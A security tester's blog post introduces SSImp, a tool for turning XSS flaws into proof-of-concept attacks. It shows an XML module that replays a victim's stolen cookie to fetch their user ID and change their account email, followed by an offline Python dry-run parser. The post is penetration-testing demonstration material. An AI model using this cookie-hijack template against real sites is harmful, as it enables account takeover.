Well, long time no post. Been in hospital. Been busy with college. Life gets in the way of hacking.
Usually when one wants to illustrate an XSS vulnerability there are two approaches. The first is to show the client the XSS and assume that they know and understand the impact. The second is to write a fully fledged exploit which takes some form of action on the client's server so that they can see the truly devastating impact. I frequently find that the second of these options is the only possible way to draw attention to the problems of XSS, but I have also grown very tired of having to write these from scratch, setting up cookie loggers etc.
The solution that I have come up with is called the ServerSideImpersonator or SSImp.
Here's how it works:
- Find an injection point.
- Write a module that does what you want.
To explain what happens then...
Here's an example of a test module that I recently created:
    <?xml version="1.0" encoding="utf-8" ?>
    <modules>
      <action name="the_action">
        <requires type="querystring" name="cookie" />
        <request url="https://www.victim.com/getauserid.php" type="get">
          <setcookie type="querystring" name="cookie" />
          <storevariable name="userid" type="regex" pattern="UserID=(\d+)" group="1" />
        </request>
        <request url="https://www.victim.com/settings.php" type="post">
          <setcookie type="querystring" name="cookie" />
          <!-- "&" must be written as "&amp;" inside an XML attribute, otherwise the module is not well-formed -->
          <postdata value="Email=username%40gmail.com&amp;UserID=[VAR:userid]&amp;action=new+email"></postdata>
        </request>
        <output>UserID="[VAR:userid]".</output>
      </action>
    </modules>
So, what does this do?
- Makes a GET request to https://www.victim.com/getauserid.php, using the cookie that was passed in the cookie querystring parameter
- Looks on the resulting page for a regex match for UserID=(\d+) and, if found, stores Group 1, Capture 0 in the variable called userid
- Makes a POST request to https://www.victim.com/settings.php, using the cookie that was passed in the cookie querystring parameter, posting the data "Email=username%40gmail.com&UserID=[VAR:userid]&action=new+email" with [VAR:userid] replaced by the value of userid fetched in the previous request
- Prints the output line UserID="[VAR:userid]", again with the stored value substituted in
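An offline parser for the module format above, as an added example in Python (not SSImp's own C# code): it loads the module, runs the storevariable regex over a constructed sample response, and substitutes [VAR:userid] into the postdata and output, without sending a single request, so the module's logic can be checked before it is ever pointed at anything. The sample body and the UserID value 4711 are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

# The module from the post, embedded as the parser's input.
MODULE_XML = r"""<?xml version="1.0" encoding="utf-8" ?>
<modules><action name="the_action"><requires type="querystring" name="cookie" />
 <request url="https://www.victim.com/getauserid.php" type="get">
  <setcookie type="querystring" name="cookie" />
  <storevariable name="userid" type="regex" pattern="UserID=(\d+)" group="1" />
 </request>
 <request url="https://www.victim.com/settings.php" type="post">
  <setcookie type="querystring" name="cookie" />
  <postdata value="Email=username%40gmail.com&UserID=[VAR:userid]&action=new+email"></postdata>
 </request>
 <output>UserID="[VAR:userid]".</output>
</action></modules>"""

# Constructed response body for the GET step (the page shows no real response).
SAMPLE_BODIES = {"https://www.victim.com/getauserid.php": "<p>Welcome back. UserID=4711</p>"}

def parse_module(xml_text):
    """Return the first <action> as a dict. A bare '&' inside an attribute (as in the
    module above) is not well-formed XML, so it is escaped before parsing."""
    xml_text = re.sub(r"&(?!(?:amp|lt|gt|quot|apos|#\w+);)", "&amp;", xml_text)
    action = ET.fromstring(xml_text).find("action")
    requests = []
    for r in action.findall("request"):
        post = r.find("postdata")
        requests.append({
            "method": r.get("type", "get").upper(), "url": r.get("url"),
            "postdata": post.get("value") if post is not None else None,
            "store": [(s.get("name"), s.get("pattern"), int(s.get("group", "0")))
                      for s in r.findall("storevariable") if s.get("type") == "regex"]})
    return {"name": action.get("name"), "requests": requests,
            "requires": [q.get("name") for q in action.findall("requires")],
            "output": action.findtext("output", "")}

def substitute(text, variables):
    """Replace each [VAR:name] with its stored value; unknown names are left untouched."""
    return re.sub(r"\[VAR:(\w+)\]", lambda m: variables.get(m.group(1), m.group(0)), text)

def dry_run(module, bodies):
    """Walk the requests with no network I/O, using the sample body for each URL."""
    variables, planned = {}, []
    for r in module["requests"]:
        data = substitute(r["postdata"], variables) if r["postdata"] else None
        planned.append((r["method"], r["url"], data))  # what the module would send
        for name, pattern, group in r["store"]:  # <storevariable> over the response
            if (m := re.search(pattern, bodies.get(r["url"], ""))):
                variables[name] = m.group(group)
    return planned, variables, substitute(module["output"], variables)
```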
This seems to me a far quicker way of constructing XSS PoC attacks and I will continue to update the framework as I get time. I also plan, time permitting, to get back to work on the .NETIDS, which has lapsed in the last few months for the aforementioned reasons.
Check out the SSImp source (C#) at http://code.google.com/p/ssimp/